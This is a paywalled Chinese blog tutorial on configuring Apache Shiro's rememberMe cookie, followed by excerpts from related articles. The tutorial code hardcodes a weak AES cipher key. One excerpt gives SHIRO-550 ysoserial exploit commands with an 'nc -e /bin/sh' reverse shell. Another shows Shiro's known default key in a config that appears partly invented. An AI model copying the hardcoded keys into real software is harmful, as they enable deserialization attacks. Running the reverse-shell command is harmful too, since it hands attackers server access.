Shiro实现rememberMe功能

最新推荐文章于 2024-05-06 08:30:00 发布
最新推荐文章于 2024-05-06 08:30:00 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: SpringBoot 文章标签: shiro
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/127182293
版权

一、介绍

Shiro提供了记住我(RememberMe) 的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

基本流程

  1. 首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来;
  2. 关闭浏览器再重新打开;会发现浏览器还是记住你的;
  3. 访问一般的网页服务器端,仍然知道你是谁,且能正常访问;
  4. 但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还是需要再进行身份认证的,以确保当前用户还是你。

二、实现

2.1、沿用博客“登录认证前端”的项目

2.2、在ShiroConfig中配置cookie属性

    //cookie属性设置
    public SimpleCookie rememberMeCookie(){
   
        SimpleCookie cookie = new SimpleCookie("rememberMe");
        //设置跨域
        //cookie.setDomain(domain);
        cookie.setPath("/");
        cookie.setHttpOnly(true);
        cookie.setMaxAge(30*24*60*60);
        return cookie;
    }

2.3、在ShiroConfig中创建Shiro的cookie管理对象

    //创建Shiro的cookie管理对象
    public CookieRememberMeManager rememberMeManager(){
   
        CookieRememberMeManager cookieRememberMeManager = new CookieRememberMeManager();
        cookieRememberMeManager.setCookie(rememberMeCookie());
        cookieRememberMeManager.setCipherKey("1234567890987654".getBytes());
最低0.47元/天 解锁文章
Massimo_ycw
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
跟我学Shiro第13章Demo(RememberMe)
09-23
本人亲自写的Demo,可运行没问题,其中包括RememberMy章节的髌,可以用jetty运行,我把Ehcache缓存改成了3秒,有需要可以自己改回来。
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
最新发布
程序员阿皓的博客
05-06 147
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
Shiro进阶(四)Shiro之RememberMe
web13985085406的博客
04-22 1442
前言 本章讲解一下Shiro的记住我的功能 方法 1.概念 首先要澄清一点的是,这里的记住我并不是记住用户名和密码。 shiro的记住我是一种基于cookie实现的方式,特定的页面在关掉浏览器后(session消失)也可以进行访问的功能! 2.实现步骤 1)前台登录页面修改 如果需要记住我的功能,那么前台页面需要一个checkbox多选框来让用户进行勾选。 这里我就不进行说明了。丑一点没关系哈。 2)controller登录方法修改 3)修改shiro配置文件 <!-- 配置Shiro的Secur
Shiro的RememberMe的理解
ITWANGBOIT的博客
10-23 442
1:设置cookie的存活时间 2:shiro把认证成功的principal序列化到cookie中,然后发送到浏览器端。以往是将session的id存放到cookie中,浏览器再次访问时,带着cookie中的sessionid来服务器中找session。 3:打开浏览器再次访问系统时,带着cookie中序列化的principal来访问系统。 4:所以shiro的RememberMe和sess...
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1553
当登录后是可以正常访问/man的主页的,如果使用了记住我功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。4.但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还 是需要再进行身份认证的,以确保当前用户还是你。2.登录时不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住我功能的cookie设置;
快速掌握shiro安全框架(四)之remember me功能
bigdata_dog的博客
03-04 899
ShiroConfig配置类中添加记住我和cookie相关配置项以及用户过滤器
08.Shiro实现记住我功能
qq_56403015的博客
11-14 574
​ 在我们使用网页时,有记住我的功能,在登录时勾选这一项即可在这cookie生效日期之内,就算关闭浏览器我们在下一次进入该界面时依然可以保证我们可以进行操作而无需登录。对于实现功能,我们需要以下的步骤。
shiro配置rememberMe
卑微的码农
04-15 768
package com.example.ghs.shiro.config; import lombok.extern.slf4j.Slf4j; import org.apache.shiro.codec.Base64; import org.apache.shiro.mgt.SecurityManager; import org.apache.shiro.spring.security.interceptor.AuthorizationAttributeSourceAdvisor; import org.
SpringBoot学习:整合shiro(rememberMe记住我功能
热门推荐
期待破茧成蝶
04-08 1万+
项目下载地址:http://download.csdn.NET/detail/aqsunkai/9805821 首先在shiro配置类中注入rememberMe管理器 /** * cookie对象; * rememberMeCookie()方法是设置Cookie的生成模版,比如cookie的name,cookie的有效时间等等。 * @return */ @Bean public
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,...
springmvc+shiro实现记住我功能以及权限缓存.rar
07-20
2. 实现RememberMe服务:配置RememberMeManager,例如设置Cookie的名称、路径、有效期等属性。 3. 缓存管理:配置CacheManager,如EhCache,设置缓存策略和过期时间。 4. 权限验证:在Controller或Service层,使用...
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 5185
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
Apache Shiro(七)——Shiro的RememberMe功能
传臣、的博客
10-28 9424
一、概述 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 1、首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来; 2、关闭浏览器再重新打开;会发现浏览器还是记住你的; 3、访问一般...
vulhub漏洞复现——Shiro(CVE-2016-4437) 反序列化
m0_62805300的博客
06-15 323
利用工具https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 填入url选择利用方式再攻击上上开启监听 反弹shell
Shiro-550漏洞复现
weixin_51641247的博客
03-25 184
利用集成工具复现shiro550漏洞
shiro教程9(session和remember me)
波波烤鸭的博客
01-26 4815
session shiro提供的session不依赖web容器,可以直接使用,如果是在web环境下,session中的数据和httpsession中的数据是通的。Shiro中的session可以出现在任何地方,例如service、dao等,不需要从controller中传递session参数,用户保存在session中的数据可以在HTTP session中获取,保存在httpsession中的数...
shiro关闭rememberme功能
06-07
关闭Shiro的RememberMe功能,你可以在Shiro的配置文件中设置一个rememberMe属性,将它的值设为false。具体来说,你需要在配置文件中添加如下内容: ``` [main] securityManager.rememberMeManager = org.apache.shiro.mgt.RememberMeManager securityManager.rememberMeManager.cookie = org.apache.shiro.web.servlet.SimpleCookie securityManager.rememberMeManager.cookie.name = rememberMe securityManager.rememberMeManager.cookie.maxAge = 2592000 securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== [users] # ... [roles] # ... [urls] # ... [main] rememberMe = false ``` 在这个配置中,rememberMe属性被设为false,表示关闭RememberMe功能。如果你想开启它,只需要将它的值改为true即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值